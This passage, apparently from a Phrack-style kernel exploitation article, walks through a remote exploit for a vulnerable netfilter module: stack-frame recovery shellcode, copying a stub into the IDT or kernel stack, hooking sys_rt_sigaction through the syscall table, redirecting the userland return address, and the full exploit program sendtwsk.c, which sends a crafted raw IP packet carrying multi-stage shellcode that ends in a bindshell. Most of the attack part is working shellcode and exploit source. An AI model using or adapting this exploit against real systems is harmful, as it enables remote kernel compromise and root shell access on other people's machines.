"\x74\x02"                 // je 804851e <end>
"\xeb\xec"                 // jmp 804850a <scan>

 - decrement the 'preempt_count' value [which is just the member above the
   addr_limit one] 

/* end: */
"\xff\x48\xfc"             // decl 0xfffffffc(%eax)

To further improve the shellcode it would be a good idea to perform a test
on the preempt_count value, so that we don't end up lowering it below
zero. 
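The whole scan-and-decrement logic translates to a handful of C lines.
This is a userland sketch with a made-up thread_info layout (the real
struct has more fields): what matters is the technique, i.e. walking the
stack bottom one word at a time until the addr_limit fingerprint, then
decrementing the word just above it.

```c
#include <assert.h>
#include <stdint.h>

#define ADDR_LIMIT_USER   0xc0000000u   /* userland process        */
#define ADDR_LIMIT_KERNEL 0xffffffffu   /* kernel thread/idle task */

/* fake bottom-of-stack layout, illustrative only */
static uint32_t fake_ti[8] = {
        0xdeadbeef,                     /* 'task' pointer slot  */
        0, 0, 0, 0,                     /* flags/status/cpu ... */
        1,                              /* preempt_count        */
        ADDR_LIMIT_USER,                /* addr_limit           */
        0
};

/* the real stub derives 'ti' with 'and $0xffffe000,%esp' (8kb-aligned
 * stack); here we simply take it as a parameter */
static uint32_t *find_and_dec_preempt(uint32_t *ti)
{
        uint32_t *p = ti;

        do {
                p++;                    /* 'add $0x4,%eax' in the stub */
        } while (*p != ADDR_LIMIT_USER && *p != ADDR_LIMIT_KERNEL);

        p[-1]--;                        /* 'decl 0xfffffffc(%eax)'     */
        return p - 1;
}
```

The returned pointer is the preempt_count slot, already decremented, just
as the 'decl' instruction leaves it.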

---[ 3.2.4 - Copying the Stub 

We have just finished presenting a generic method to restore the stack
after a 'general mess-up' of the netfilter core call-frames. 
What we have to do now is to find some place to store our shellcode, since
we can't (as we said before) directly execute from inside interrupt
context. [remember the note: this step and the following one are executed
before getting out of the softirq context]. 

Since we don't know almost anything about the remote kernel image memory
mapping we need to find a 'safe place' to store the shellcode, that is, we
need to locate some memory region that we can for sure reference and that
won't create problems (read : Oops) if overwritten. 

There are two places where we can copy our 'stage-2' shellcode :

  - IDT (Interrupt Descriptor Table) : we can easily get the IDT logical
    address at runtime (as we saw previously in the NULL dereference
    example) and Linux uses only the 0x80 software interrupt vector : 

    | exception       |
    |    entries      |
    |  hw interrupt   |
    |      entries    |
    |-----------------| entry #32 ==+
    |                 |             |
    |  soft interrupt |             |
    |      entries    |             | usable gap
    |                 |             |
    |                 |             |
    |                 |           ==+
    |  int 0x80       | entry #128
    |                 |
    +-----------------+ <- offset limit

    Between entry #32 and entry #128 we have all the unused descriptor
    entries, each 8 bytes long. Linux nowadays doesn't map that memory
    area as read-only [as it should be], so we can write to it [*]. 	
    We thus have : (128 - 32) * 8 = 96 * 8 = 768 bytes, which is enough 
    for our 'stage-2 shellcode'. 
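As a quick sanity check of the gap arithmetic (the entry numbers are the
ones used above: everything between the last reserved entry and the
int $0x80 gate is free on a stock kernel, and each descriptor is 8 bytes):

```c
#include <assert.h>

/* usable-gap arithmetic for the IDT storage trick */
enum { IDT_DESC_SIZE = 8, FIRST_FREE_ENTRY = 32, INT80_ENTRY = 128 };

static int idt_gap_bytes(void)
{
        return (INT80_ENTRY - FIRST_FREE_ENTRY) * IDT_DESC_SIZE;
}
```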

    [*] starting with the Linux kernel 2.6.20 it is possible to map some
        areas as read-only [the IDT is just one of those]. Since we don't
        'start' by writing into the IDT area and executing from there, it
        is possible to bypass that protection by simply modifying the
        kernel page tables protection directly in 'previous stages' of the
        exploit.
  - the current kernel stack : we need to make a little assumption here,
    that is, being inside a process that will last for some time (until
    we are able to redirect kernel code over our shellcode, as we will
    see in the next section). 
    Usually the stack doesn't grow past 4kb, so we have an almost free 
    4kb page for us (given that the remote system is using an 8kb stack
    space). To be safe, we can leave some pad space before the shellcode. 
    We need to take care of the 'struct thread_info' saved at the
    'bottom' of the kernel stack (and that logically we don't want to
    overwrite ;) ) :

    | thread_info     |
    |---------------- |  ==+
    |                 |    | usable gap
    |                 |    |
    |-----------------|  ==+
    |                 |
    |       ^         |
    |       |         |  [ normally the stack doesn't ]
    |       |         |  [ grow over 4kb              ]
    |                 |
    |  ring0 stack    |
    Altogether we have : (8192 - 4096) - sizeof(descriptor) - pad ~= 2048
    bytes, which is even more than before. 
    With a more complex shellcode we can traverse the process table and
    look for a 'safe process' (init, some kernel thread, some main
    server process). 

Let's give a look to the shellcode performing that task : 

 - get the stack address where we are [the uber-famous call/pop trick]

"\xe8\x00\x00\x00\x00"         //  call   51 <search+0x29>
"\x59"                         //  pop    %ecx
 - scan the stack until we find the 'start marker' of our stage-2 stub. 
   We put a \xaa byte at the start of it, and it's the only one present in
   the shellcode. The add $0x10 is there just to start scanning after the
   'cmp $0xaa, %al', which would otherwise give a false positive for \xaa.

"\x83\xc1\x10"                 //  add    $0x10, %ecx
"\x41"                         //  inc    %ecx
"\x8a\x01"                     //  mov    (%ecx),%al
"\x3c\xaa"                     //  cmp    $0xaa,%al
"\x75\xf9"                     //  jne    52 <search+0x2a>

 - we have found the start of the shellcode, let's copy it into the 'safe
   place' until the 'end marker' (\xbb). The 'safe place' here is saved
   inside the %esi register. We haven't shown how we calculated it because
   it directly derives from the shellcode used in the next section (it's
   simply somewhere in the stack space). This code could be optimized by
   saving the 'stage-2' stub size in %ecx and using rep/repnz in
   conjunction with mov instructions. 

"\x41"                         //  inc    %ecx
"\x8a\x01"                     //  mov    (%ecx),%al
"\x88\x06"                     //  mov    %al,(%esi)
"\x46"                         //  inc    %esi
"\x41"                         //  inc    %ecx
"\x80\x39\xbb"                 //  cmpb   $0xbb,(%ecx)
"\x75\xf5"                     //  jne    5a <search+0x32>
   [during the development phase of the exploit we changed the 'stage-2'
    part a couple of times, that's why we left that kind of copy
    operation in, even if it's less elegant :) ]
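The marker-based copy is easier to follow in C. This is a direct
rendition of the loop above; 'src' is assumed to already point past the
stub's own 'cmp $0xaa,%al' bytes, which is what the 'add $0x10,%ecx'
takes care of in the shellcode.

```c
#include <assert.h>
#include <stddef.h>

/* find the 0xaa start marker, then copy byte-by-byte into the safe
 * place until the 0xbb end marker; returns the bytes copied */
static size_t copy_between_markers(const unsigned char *src,
                                   unsigned char *dst)
{
        size_t n = 0;

        while (*src != 0xaa)            /* scan for the start marker */
                src++;
        src++;                          /* skip the marker itself    */

        while (*src != 0xbb)            /* copy up to the end marker */
                dst[n++] = *src++;

        return n;
}
```

The rep/repnz optimization mentioned above would replace the second loop
once the stub size is known in advance.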

---[ 3.2.5 - Executing Code in Userspace Context [Gimme Life!] 

Okay, we have a 'safe place', all we need now is a 'safe moment', that is,
a process context to execute in. The first 'easy' solution that could come
to your mind could be overwriting the #128 software interrupt [int $0x80],
so that it points to our code. The first process issuing a system call
would thus become our 'victim process-context'.
This approach has, though, two major drawbacks : 
  - we have no way to intercept processes using sysenter to access kernel
    space (what if all of them were using it ? It would be a pretty odd
    way to fail)

  - we can't control which process is 'hooked' and that might be
    'disastrous' if the process is the init one or a critical one,
    since we'll borrow its userspace to execute our shellcode (a bindshell
    or a connect-back is not a short-lasting process).  

We have to go a little deeper inside the kernel to achieve a good
hooking. Our choice was to use the syscall table and to redirect a system
call which has a high chance of being called and which we're almost sure
isn't used inside init or any critical process. 
Our choice, after a couple of tests, fell on the rt_sigaction syscall,
but it's not the only option. It just worked pretty well for us. 
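The hook itself is conceptually tiny: a syscall table is just an array of
function pointers, so hooking is save-entry / overwrite-entry, and the
stage-2 stub restores the saved entry before doing anything else. The
sketch below models exactly that; the '174' is sys_rt_sigaction on i386
(0x2b8 / 4), everything else is illustrative.

```c
#include <assert.h>

typedef long (*syscall_fn)(long);

#define NR_RT_SIGACTION 174             /* 0x2b8 / 4 on i386 */

static long real_rt_sigaction(long arg) { return arg + 1; }

static syscall_fn sys_call_table[256];
static syscall_fn saved_entry;
static int        hooked;

static long stage2_stub(long arg)
{
        hooked = 1;
        /* patch the table back, exactly as the stage-2 stub does */
        sys_call_table[NR_RT_SIGACTION] = saved_entry;
        /* stay transparent: hand over to the real syscall */
        return saved_entry(arg);
}

static void install_hook(void)
{
        saved_entry = sys_call_table[NR_RT_SIGACTION];
        sys_call_table[NR_RT_SIGACTION] = stage2_stub;
}
```

The first caller of the hooked entry runs the stub once, the table is
immediately restored, and the caller still gets the real syscall's result.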

To correctly locate the syscall table in memory we use the stub of code
that sd and devik presented in their phrack paper [23] about /dev/kmem. 

 - we get the current stack address, calculate the start of the
   thread_info and add 0x1000 (pad gap) [a symbolic value far enough
   both from the end of the thread_info and from the top of the stack].
   Here is where we set the %esi value that we presented as 'magically
   already there' in the shellcode discussed before.

"\x89\xe6"                     //  mov    %esp,%esi
"\x81\xe6\x00\xe0\xff\xff"     //  and    $0xffffe000,%esi
"\x81\xc6\x00\x10\x00\x00"     //  add    $0x1000,%esi

 - the sd & devik code, slightly re-adapted.

"\x0f\x01\x0e"                 //  sidtl  (%esi)
"\x8b\x7e\x02"                 //  mov    0x2(%esi),%edi
"\x81\xc7\x00\x04\x00\x00"     //  add    $0x400,%edi
"\x66\x8b\x5f\x06"             //  mov    0x6(%edi),%bx
"\xc1\xe3\x10"                 //  shl    $0x10,%ebx
"\x66\x8b\x1f"                 //  mov    (%edi),%bx
"\x43"                         //  inc    %ebx
"\x8a\x03"                     //  mov    (%ebx),%al
"\x3c\xff"                     //  cmp    $0xff,%al
"\x75\xf9"                     //  jne    28 <search>
"\x8a\x43\x01"                 //  mov    0x1(%ebx),%al
"\x3c\x14"                     //  cmp    $0x14,%al
"\x75\xf2"                     //  jne    28 <search>
"\x8a\x43\x02"                 //  mov    0x2(%ebx),%al
"\x3c\x85"                     //  cmp    $0x85,%al
"\x75\xeb"                     //  jne    28 <search>
"\x8b\x5b\x03"                 //  mov    0x3(%ebx),%ebx 

- logically we need to save the original address of the syscall somewhere,
  and we decided to put it just before the 'stage-2' shellcode : 

 "\x81\xc3\xb8\x02\x00\x00"     //  add 0x2b8, %ebx       
 "\x89\x5e\xf8"                 //  movl %ebx, 0xfffffff8(%esi) 
 "\x8b\x13"                     //  mov    (%ebx),%edx
 "\x89\x56\xfc"                 //  mov    %edx,0xfffffffc(%esi)
 "\x89\x33"                     //  mov    %esi,(%ebx)

As you see, we save the address of the rt_sigaction entry [offset 0x2b8]
inside the syscall table (we will need it at restore time, so that we
won't have to calculate it again) and the original address of the function
itself (the counterpart used in the restoring phase). We then make the
rt_sigaction entry point to our shellcode : %esi. Now it should be even
clearer why, in the previous section, we ''magically'' had the destination
address to copy our stub into in %esi.    

The first process issuing an rt_sigaction call will just give life to the
stage-2 shellcode, which is the final step before getting the connect-back
or the bindshell executed. [or whatever shellcode you like more ;) ]
We're still in kernel land, while our final goal is to execute a userland
shellcode, so we still have to perform a bunch of operations. 

There are basically two methods (not the only two, but probably the easier
and most effective ones) to achieve our goal : 

  - find the saved EIP, temporarily disable the WP control register flag,
    copy the userland shellcode over there and re-enable the WP flag [it
    could be potentially dangerous on SMP]. If the syscall is called
    through sysenter, the saved EIP points into the vsyscall table, so we
    must 'scan' the stack 'until the ret' (not much different from what
    we do in the stack frame recovery step, just easier here), to get the
    real userspace saved EIP after the vsyscall 'return' : 

    0xffffe410 <__kernel_vsyscall+16>:      pop    %ebp
    0xffffe411 <__kernel_vsyscall+17>:      pop    %edx
    0xffffe412 <__kernel_vsyscall+18>:      pop    %ecx
    0xffffe413 <__kernel_vsyscall+19>:      ret

    As you can see, the first executed userspace address (writable) is at
    saved *(ESP + 12).

  - find the saved ESP or use syscall saved parameters pointing to a
    userspace buffer, copy the shellcode into that memory location and
    overwrite the saved EIP with the saved ESP (or the userland buffer
    address)

The second method is preferable (easier and safer), but if we're dealing
with an architecture supporting the NX-bit or with a software patch that
emulates the execute bit (to mark the stack and eventually the heap as
non-executable), we have to fall back to the first, more intrusive,
method, or our userland process will just segfault while attempting to
execute the shellcode. Since we do have full control of the
process-related kernel data we can also copy the shellcode to a given
place and modify the page protection. [not different from the idea
proposed above for the read-only IDT in the 'Copying the Stub' section]
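Method 2 boils down to one word-sized copy on the saved-registers area.
The sketch below replays it on a fake snapshot of the ring-0 stack: the
userland ESP saved at 0x38(%esp) is copied over the userland EIP saved at
0x2c(%esp), so the return-to-userspace path jumps into the
(shellcode-filled) stack. The two offsets are the ones assumed by the
stub for an int $0x80 entry, not universal constants.

```c
#include <assert.h>
#include <stdint.h>

/* overwrite the saved userland EIP with the saved userland ESP */
static void redirect_saved_eip(uint32_t *kstack)
{
        uint32_t user_esp = kstack[0x38 / 4];   /* saved userland ESP */

        kstack[0x2c / 4] = user_esp;            /* becomes saved EIP  */
}
```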

Once again, let's go on with the dirty details : 

 - the usual call/pop trick to get the address we're executing from 

"\xe8\x00\x00\x00\x00"         //  call   8 <func+0x8>
"\x59"                         //  pop    %ecx
 - patch back the syscall table with the original rt_sigaction address
   [if those 0xff8 and 0xffc have no meaning for you, just remember that we 
    added 0x1000 to the thread_struct stack address to calculate our 'safe
    place' and that we stored just before both the syscall table entry 
    address of rt_sigaction and the function address itself]

"\x81\xe1\x00\xe0\xff\xff"     //  and    $0xffffe000,%ecx
"\x8b\x99\xf8\x0f\x00\x00"     //  mov    0xff8(%ecx),%ebx
"\x8b\x81\xfc\x0f\x00\x00"     //  mov    0xffc(%ecx),%eax
"\x89\x03"                     //  mov    %eax,(%ebx)

 - locate Userland ESP and overwrite Userland EIP with it [method 2] 

"\x8b\x74\x24\x38"             //  mov    0x38(%esp),%esi
"\x89\x74\x24\x2c"             //  mov    %esi,0x2c(%esp)
"\x31\xc0"                     //  xor    %eax,%eax

 - once again we use a marker (\x22) to locate the shellcode we want to
   copy on process stack. Let's call it 'stage-3' shellcode. 
   We use just another simple trick here to locate the marker and avoid a
   false positive : instead of jumping after (as we did for the \xaa one)
   we set the '(marker value) - 1' in %al and then increment it. 
   The copy is exactly the same (with the same 'note') as the one we saw
   before 

"\xb0\x21"                     //  mov    $0x21,%al
"\x40"                         //  inc    %eax
"\x41"                         //  inc    %ecx
"\x38\x01"                     //  cmp    %al,(%ecx)
"\x75\xfb"                     //  jne    2a <func+0x2a>
"\x41"                         //  inc    %ecx
"\x8a\x19"                     //  mov    (%ecx),%bl
"\x88\x1e"                     //  mov    %bl,(%esi)
"\x41"                         //  inc    %ecx
"\x46"                         //  inc    %esi
"\x38\x01"                     //  cmp    %al,(%ecx)
"\x75\xf6"                     //  jne    30 <func+0x30>

 - return from the syscall and let the process cleanly exit to userspace.
   Control will be transferred to our modified EIP and the shellcode will
   be executed.

"\xc3"                         //  ret

We have used a 'fixed' value to locate the userland ESP/EIP, which worked
well for the 'standard' kernels/apps we tested it on (getting to the
syscall via int $0x80). With a little more effort (worth the time) you can
avoid those offset assumptions by implementing code similar to the one
used for the Stack Frame Recovery technique. 
Just take a look at how the current userland EIP, ESP, CS and SS are saved
before jumping to kernel level :

ring0 stack:
| SS     |  
| ESP    |  <--- saved ESP
| EFLAG  |
| CS     |  
| EIP    |  <--- saved EIP
|......  |

All 'unpatched' kernels will have the same value for SS and CS and we can
use it as a fingerprint to locate ESP and EIP (which we can test to be
below PAGE_OFFSET [*]) 

[*] As we already said, on latest kernels there could be a different
    uspace/kspace split address than 0xc0000000 [2G/2G or 1G/3G 
    splits].

We won't show the 'stage-3' shellcode here since it is a standard
'userland' bindshell one. Just use the one you need depending on the
scenario.

---[ 3.2.6 - The Code : sendtwsk.c

< stuff/expl/sendtwsk.c > 

#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/ip.h>
#include <netinet/udp.h>

/* from vuln module */
#define MAX_TWSKCHUNK 30
/* end */

#define NOP 0x90

#define OVERFLOW_NEED   20

#define JMP           "\xe9\x07\xfe\xff\xff"
#define SIZE_JMP      (sizeof(JMP) -1)

#define TWSK_PACKET_LEN ((MAX_TWSKCHUNK * sizeof(struct twsk_chunk)) \
                         + sizeof(struct twsk) + sizeof(struct iphdr))

#define TWSK_PROTO 37

#define DEFAULT_VSYSCALL_RET 0xffffe413
#define DEFAULT_VSYSCALL_JMP 0xc01403c0

/*
 *  find the correct value..
 *
 * alpha:/usr/src/linux/debug/article/remote/figaro/ip_figaro# ./roll
 * val: 2147483680, 80000020 result: 512
 * val: 2147483681, 80000021 result: 528
 */

#define NEGATIVE_CHUNK_NUM 0x80000020

char shellcode[]=
/* hook sys_rtsigaction() and copy the 2level shellcode (72) */

 "\x90\x90"                     //  nop; nop; [alignment]
 "\x89\xe6"                     //  mov    %esp,%esi
 "\x81\xe6\x00\xe0\xff\xff"     //  and    $0xffffe000,%esi
 "\x81\xc6\x00\x10\x00\x00"     //  add    $0x1000,%esi
 "\x0f\x01\x0e"                 //  sidtl  (%esi)
 "\x8b\x7e\x02"                 //  mov    0x2(%esi),%edi
 "\x81\xc7\x00\x04\x00\x00"     //  add    $0x400,%edi
 "\x66\x8b\x5f\x06"             //  mov    0x6(%edi),%bx
 "\xc1\xe3\x10"                 //  shl    $0x10,%ebx
 "\x66\x8b\x1f"                 //  mov    (%edi),%bx
 "\x43"                         //  inc    %ebx
 "\x8a\x03"                     //  mov    (%ebx),%al
 "\x3c\xff"                     //  cmp    $0xff,%al
 "\x75\xf9"                     //  jne    28 <search>
 "\x8a\x43\x01"                 //  mov    0x1(%ebx),%al
 "\x3c\x14"                     //  cmp    $0x14,%al
 "\x75\xf2"                     //  jne    28 <search>
 "\x8a\x43\x02"                 //  mov    0x2(%ebx),%al
 "\x3c\x85"                     //  cmp    $0x85,%al
 "\x75\xeb"                     //  jne    28 <search>
 "\x8b\x5b\x03"                 //  mov    0x3(%ebx),%ebx [get

 "\x81\xc3\xb8\x02\x00\x00"     //  add 0x2b8, %ebx       [get
sys_rt_sigaction offset]
 "\x89\x5e\xf8"                 //  movl %ebx, 0xfffffff8(%esi) [save

 "\x8b\x13"                     //  mov    (%ebx),%edx
 "\x89\x56\xfc"                 //  mov    %edx,0xfffffffc(%esi)
 "\x89\x33"                     //  mov    %esi,(%ebx)    [make
sys_rt_sigaction point to our shellcode]

 "\xe8\x00\x00\x00\x00"         //  call   51 <search+0x29>
 "\x59"                         //  pop    %ecx
 "\x83\xc1\x10"                 //  addl $10, %ecx
 "\x41"                         //  inc    %ecx
 "\x8a\x01"                     //  mov    (%ecx),%al
 "\x3c\xaa"                     //  cmp    $0xaa,%al
 "\x75\xf9"                     //  jne    52 <search+0x2a>
 "\x41"                         //  inc    %ecx
 "\x8a\x01"                     //  mov    (%ecx),%al
 "\x88\x06"                     //  mov    %al,(%esi)
 "\x46"                         //  inc    %esi
 "\x41"                         //  inc    %ecx
 "\x80\x39\xbb"                 //  cmpb   $0xbb,(%ecx)
 "\x75\xf5"                     //  jne    5a <search+0x32>

/* find and decrement preempt counter (32) */

 "\x89\xe0"                     //  mov %esp,%eax
 "\x25\x00\xe0\xff\xff"         //  and $0xffffe000,%eax
 "\x83\xc0\x04"                 //  add $0x4,%eax
 "\x8b\x18"                     //  mov (%eax),%ebx
 "\x83\xfb\xff"                 //  cmp $0xffffffff,%ebx
 "\x74\x0a"                     //  je 804851e <end>
 "\x81\xfb\x00\x00\x00\xc0"     //  cmp $0xc0000000,%ebx
 "\x74\x02"                     //  je 804851e <end>
 "\xeb\xec"                     //  jmp 804850a <scan>
 "\xff\x48\xfc"                 //  decl 0xfffffffc(%eax)

/* stack frame recovery step */

 "\x58"                         //  pop    %eax
 "\x83\x3c\x24\x02"             //  cmpl   $0x2,(%esp)
 "\x75\xf9"                     //  jne    8048330 <do_unroll>
 "\x83\x7c\x24\x04\x01"         //  cmpl   $0x1,0x4(%esp)
 "\x75\xf2"                     //  jne    8048330 <do_unroll>
 "\x83\x7c\x24\x10\x00"         //  cmpl   $0x0,0x10(%esp)
 "\x75\xeb"                     //  jne    8048330 <do_unroll>
 "\x8d\x64\x24\xfc"             //  lea    0xfffffffc(%esp),%esp

 "\x8b\x04\x24"                 //  mov    (%esp),%eax
 "\x89\xc3"                     //  mov    %eax,%ebx
 "\x03\x43\xfc"                 //  add    0xfffffffc(%ebx),%eax
 "\x40"                         //  inc    %eax
 "\x8a\x18"                     //  mov    (%eax),%bl
 "\x80\xfb\xc3"                 //  cmp    $0xc3,%bl
 "\x75\xf8"                     //  jne    8048351 <do_unroll+0x21>
 "\x80\x78\xff\x88"             //  cmpb   $0x88,0xffffffff(%eax)
 "\x74\xf2"                     //  je     8048351 <do_unroll+0x21>
 "\x80\x78\xff\x89"             //  cmpb   $0x89,0xffffffff(%eax)
 "\x74\xec"                     //  je     8048351 <do_unroll+0x21>
 "\x31\xc9"                     //  xor    %ecx,%ecx
 "\x48"                         //  dec    %eax
 "\x8a\x18"                     //  mov    (%eax),%bl
 "\x80\xe3\xf0"                 //  and    $0xf0,%bl
 "\x80\xfb\x50"                 //  cmp    $0x50,%bl
 "\x75\x03"                     //  jne    8048375 <do_unroll+0x45>
 "\x41"                         //  inc    %ecx
 "\xeb\xf2"                     //  jmp    8048367 <do_unroll+0x37>
 "\x40"                         //  inc    %eax
 "\x89\xc6"                     //  mov    %eax,%esi
 "\x31\xc0"                     //  xor    %eax,%eax
 "\xb0\x04"                     //  mov    $0x4,%al
 "\xf7\xe1"                     //  mul    %ecx
 "\x29\xc4"                     //  sub    %eax,%esp
 "\x31\xc0"                     //  xor    %eax,%eax
 "\xff\xe6"                     //  jmp    *%esi

/* end of stack frame recovery */

/* stage-2 shellcode */

 "\xaa"                         //  border stage-2 start

 "\xe8\x00\x00\x00\x00"         //  call   8 <func+0x8>
 "\x59"                         //  pop    %ecx
 "\x81\xe1\x00\xe0\xff\xff"     //  and    $0xffffe000,%ecx
 "\x8b\x99\xf8\x0f\x00\x00"     //  mov    0xff8(%ecx),%ebx
 "\x8b\x81\xfc\x0f\x00\x00"     //  mov    0xffc(%ecx),%eax
 "\x89\x03"                     //  mov    %eax,(%ebx)
 "\x8b\x74\x24\x38"             //  mov    0x38(%esp),%esi
 "\x89\x74\x24\x2c"             //  mov    %esi,0x2c(%esp)
 "\x31\xc0"                     //  xor    %eax,%eax
 "\xb0\x21"                     //  mov    $0x21,%al
 "\x40"                         //  inc    %eax
 "\x41"                         //  inc    %ecx
 "\x38\x01"                     //  cmp    %al,(%ecx)
 "\x75\xfb"                     //  jne    2a <func+0x2a>
 "\x41"                         //  inc    %ecx
 "\x8a\x19"                     //  mov    (%ecx),%bl
 "\x88\x1e"                     //  mov    %bl,(%esi)
 "\x41"                         //  inc    %ecx
 "\x46"                         //  inc    %esi
 "\x38\x01"                     //  cmp    %al,(%ecx)
 "\x75\xf6"                     //  jne    30 <func+0x30>
 "\xc3"                         //  ret

 "\x22"                         //  border stage-3 start

 "\x31\xdb"                     //  xor    ebx, ebx
 "\xf7\xe3"                     //  mul    ebx
 "\xb0\x66"                     //  mov     al, 102
 "\x53"                         //  push    ebx
 "\x43"                         //  inc     ebx
 "\x53"                         //  push    ebx
 "\x43"                         //  inc     ebx
 "\x53"                         //  push    ebx
 "\x89\xe1"                     //  mov     ecx, esp
 "\x4b"                         //  dec     ebx
 "\xcd\x80"                     //  int     80h
 "\x89\xc7"                     //  mov     edi, eax
 "\x52"                         //  push    edx
 "\x66\x68\x4e\x20"             //  push    word 8270
 "\x43"                         //  inc     ebx
 "\x66\x53"                     //  push    bx
 "\x89\xe1"                     //  mov     ecx, esp
 "\xb0\xef"                     //  mov    al, 239
 "\xf6\xd0"                     //  not    al
 "\x50"                         //  push    eax
 "\x51"                         //  push    ecx
 "\x57"                         //  push    edi
 "\x89\xe1"                     //  mov     ecx, esp
 "\xb0\x66"                     //  mov     al, 102
 "\xcd\x80"                     //  int     80h
 "\xb0\x66"                     //  mov     al, 102
 "\x43"                         //  inc    ebx
 "\x43"                         //  inc    ebx
 "\xcd\x80"                     //  int     80h
 "\x50"                         //  push    eax
 "\x50"                         //  push    eax
 "\x57"                         //  push    edi
 "\x89\xe1"                     //  mov    ecx, esp
 "\x43"                         //  inc    ebx
 "\xb0\x66"                     //  mov    al, 102
 "\xcd\x80"                     //  int    80h
 "\x89\xd9"                     //  mov    ecx, ebx
 "\x89\xc3"                     //  mov     ebx, eax
 "\xb0\x3f"                     //  mov     al, 63
 "\x49"                         //  dec     ecx
 "\xcd\x80"                     //  int     80h
 "\x41"                         //  inc     ecx
 "\xe2\xf8"                     //  loop    lp
 "\x51"                         //  push    ecx
 "\x68\x6e\x2f\x73\x68"         //  push    dword 68732f6eh
 "\x68\x2f\x2f\x62\x69"         //  push    dword 69622f2fh
 "\x89\xe3"                     //  mov     ebx, esp
 "\x51"                         //  push    ecx
 "\x53"                         //  push    ebx
 "\x89\xe1"                     //  mov    ecx, esp
 "\xb0\xf4"                     //  mov    al, 244
 "\xf6\xd0"                     //  not    al
 "\xcd\x80"                     //  int     80h

 "\x22"                         //  border stage-3 end

 "\xbb";                        //  border stage-2 end

/* end of shellcode */

struct twsk_chunk {
  int type;
  char buff[12];
};

struct twsk {
  int chunk_num;
  struct twsk_chunk chunk[0];
};

/* error helpers: report and quit */
void fatal_perror(const char *issue) { perror(issue); exit(1); }

void fatal(const char *issue) { fprintf(stderr, "%s\n", issue); exit(1); }

/* packet IP checksum */
unsigned short csum(unsigned short *buf, int nwords)
{
        unsigned long sum;
        for(sum=0; nwords>0; nwords--)
                sum += *buf++;
        sum = (sum >> 16) + (sum &0xffff);
        sum += (sum >> 16);
        return ~sum;
}

void prepare_packet(char *buffer)
{
  unsigned char *ptr = (unsigned char *)buffer;
  unsigned int i;
  unsigned int left;

  left = TWSK_PACKET_LEN - sizeof(struct twsk) - sizeof(struct iphdr);
  left -= SIZE_JMP;
  left -= sizeof(shellcode)-1;

  ptr += (sizeof(struct twsk)+sizeof(struct iphdr));

  memset(ptr, 0x00, TWSK_PACKET_LEN - sizeof(struct twsk)
                    - sizeof(struct iphdr));
  memcpy(ptr, shellcode, sizeof(shellcode)-1); /* shellcode must be 4
                                                  bytes aligned */

  ptr += sizeof(shellcode)-1;

  for(i=1; i < left/4; i++, ptr+=4)
        *((unsigned int *)ptr) = DEFAULT_VSYSCALL_RET;

  *((unsigned int *)ptr) = DEFAULT_VSYSCALL_JMP;

  printf("buffer=%p, ptr=%p\n", buffer, ptr);
  strcpy((char *)ptr, JMP); /* jmp -500 */
}


int main(int argc, char *argv[])
{
        int sock;
        struct sockaddr_in sin;
        int one = 1;
        const int *val = &one;

        printf("shellcode size: %d\n", sizeof(shellcode)-1);

        char *buffer = malloc(TWSK_PACKET_LEN);
        if(buffer == NULL)
                fatal_perror("malloc");

        struct iphdr *ip = (struct iphdr *) buffer;
        struct twsk *twsk = (struct twsk *) (buffer + sizeof(struct iphdr));

        if(argc < 2)
                fatal("Usage: ./sendtwsk ip");

        sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (sock < 0)
                fatal_perror("socket");

        prepare_packet(buffer);

        sin.sin_family = AF_INET;
        sin.sin_port = htons(12345);
        sin.sin_addr.s_addr = inet_addr(argv[1]);

        /* ip packet */
        ip->ihl = 5;
        ip->version = 4;
        ip->tos = 16;
        ip->tot_len = TWSK_PACKET_LEN;
        ip->id = htons(12345);
        ip->ttl = 64;
        ip->protocol = TWSK_PROTO;
        ip->saddr = inet_addr("");
        ip->daddr = inet_addr(argv[1]);
        twsk->chunk_num = NEGATIVE_CHUNK_NUM;
        ip->check = csum((unsigned short *) buffer, TWSK_PACKET_LEN);

        if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) < 0)
                fatal_perror("setsockopt");

        if (sendto(sock, buffer, ip->tot_len, 0, (struct sockaddr *) &sin,
                   sizeof(sin)) < 0)
                fatal_perror("sendto");

        return 0;
}

< / >
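The csum() routine from the listing can be sanity-checked in isolation.
The property worth remembering about one's-complement checksums is that a
header which already embeds its own correct checksum re-checksums to zero,
which is exactly how IP validates headers. (The header words below are a
made-up but well-formed example, not taken from the exploit packet.)

```c
#include <assert.h>

/* same one's-complement routine as in sendtwsk.c */
unsigned short csum(unsigned short *buf, int nwords)
{
        unsigned long sum;

        for (sum = 0; nwords > 0; nwords--)
                sum += *buf++;
        sum = (sum >> 16) + (sum & 0xffff);     /* fold the carries */
        sum += (sum >> 16);
        return ~sum;
}
```

Filling the checksum field (word #5 of a 20-byte header) with
csum(hdr, 10) and re-running csum over the whole header must return 0.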

------[ 4 - Final words 

With the remote exploiting discussion this paper comes to an end. We have
presented different scenarios and different exploiting techniques and
'notes' that we hope you'll find somehow useful. This paper was a sort of
sum-up of the more general approaches we took in those years of 'kernel
exploiting'. 

As we said at the start of the paper, the kernel is a big and complex
beast, which offers many different points of 'attack' and which imposes
more severe constraints than userland exploiting. It is also 'relatively
new' and improvements (and new bugs, logical or not) keep coming out. 
At the same time new countermeasures come out to make our 'exploiting
life' harder and harder. 

The first draft of this paper was done some months ago, so we apologize if
some of the information presented here is outdated (or already presented
somewhere else and not properly referenced). We've tried to add a couple
of comments around the text to point out the most important recent
changes.  

So, this is the end, time remains just for some greets. Thank you for
reading so far, we hope you enjoyed the whole work. 

A last-minute shout-out goes to the bitsec guys, who gave a cool talk
about kernel exploiting at the BlackHat conference [24]. Go check their
paper/exploits for examples covering *BSD and Windows systems.

Greetz and thanks go, in random order, to :  

sgrakkyu: darklady(:*), HTB, risk (Arxlab), recidjvo (for netfilter
tricks), vecna (for being vecna:)).

twiz: lmbdwr, ga, sd, karl, cmn, christer, koba, smaster, #dnerds & 
#elfdev people for discussions, corrections, feedback and just long
'evening/late night' talks.
A last shout-out to akira, sanka, metal_militia and yhly for making the
monday evening a _great_ evening [and for all the beers offered :-) ]. 

------[ 5 - References

[1] - Intel Architecture Reference Manuals

[2] - SPARC V9 Architecture

[3] - AMD64 Reference Manuals

[4] - MCAST_MSFILTER iSEC's advisory

[5] - sendmsg local buffer overflow

[6] - kad, "Handling Interrupt Descriptor Table for fun and profit" 

[7] - iSEC Security Research

